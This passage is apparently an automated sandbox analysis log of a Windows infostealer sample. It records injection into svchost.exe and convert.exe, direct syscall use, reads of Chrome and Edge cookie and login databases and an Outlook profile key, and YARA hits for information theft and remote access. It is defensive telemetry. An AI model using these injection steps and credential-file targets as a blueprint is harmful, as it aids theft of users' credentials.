Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtAllocateVirtualMemory: Direct from: 0x773848EC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtQueryAttributesFile: Direct from: 0x77382E6C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtSetInformationThread: Direct from: 0x77382B4C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtTerminateThread: Direct from: 0x77382FCC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtQueryInformationToken: Direct from: 0x77382CAC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtOpenKeyEx: Direct from: 0x77382B9C Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtQueryValueKey: Direct from: 0x77382BEC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtDeviceIoControlFile: Direct from: 0x77382AEC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtCreateFile: Direct from: 0x77382FEC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtOpenFile: Direct from: 0x77382DCC Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe NtProtectVirtualMemory: Direct from: 0x77377B2E Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\convert.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Thread register set: target process: 1088 Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Thread APC queued: target process: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 33D008 Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00868C93 LogonUserW, 1_2_00868C93
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00813B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW, 1_2_00813B4C
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00814A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, 1_2_00814A35
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00874EC9 mouse_event, 1_2_00874EC9
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\hkLFB22XxS.exe" Jump to behavior
Source: C:\Program Files (x86)\riMAYNELmpJOEonvhslpwxHTizECOGYLjPVpHdyNUuwSormSvetDoHVjvEgC\YcTurzUREEPNDwUlDlxzRT.exe Process created: C:\Windows\SysWOW64\convert.exe "C:\Windows\SysWOW64\convert.exe" Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe" Jump to behavior
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008681F7 GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity, 1_2_008681F7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00874C03 AllocateAndInitializeSid,CheckTokenMembership,FreeSid, 1_2_00874C03
Source: hkLFB22XxS.exe Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: IProgram Manager
Source: hkLFB22XxS.exe, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000000.2493693247.0000000001141000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 00000007.00000002.4578331295.0000000001140000.00000002.00000001.00040000.00000000.sdmp, YcTurzUREEPNDwUlDlxzRT.exe, 0000000A.00000000.2637266429.00000000014F1000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0083886B cpuid 1_2_0083886B
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_008450D7 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 1_2_008450D7
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00852230 GetUserNameW, 1_2_00852230
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_0084418A __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte, 1_2_0084418A
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00814AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, 1_2_00814AFE

Stealing of Sensitive Information

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies Jump to behavior
Source: C:\Windows\SysWOW64\convert.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ Jump to behavior
Source: hkLFB22XxS.exe Binary or memory string: WIN_81
Source: hkLFB22XxS.exe Binary or memory string: WIN_XP
Source: hkLFB22XxS.exe Binary or memory string: WIN_XPe
Source: hkLFB22XxS.exe Binary or memory string: WIN_VISTA
Source: hkLFB22XxS.exe Binary or memory string: WIN_7
Source: hkLFB22XxS.exe Binary or memory string: WIN_8
Source: hkLFB22XxS.exe Binary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 5USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte

Remote Access Functionality

barindex
Source: Yara match File source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000002.00000002.2571476306.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571790070.00000000028B0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.4580723330.0000000005200000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4568789406.0000000000230000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000002.4571023463.0000000002870000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2571552452.00000000005A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.4578971846.0000000003210000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000002.00000002.2572095157.0000000004000000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00886596 socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket, 1_2_00886596
Source: C:\Users\user\Desktop\hkLFB22XxS.exe Code function: 1_2_00886A5A socket,WSAGetLastError,bind,WSAGetLastError,closesocket, 1_2_00886A5A
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs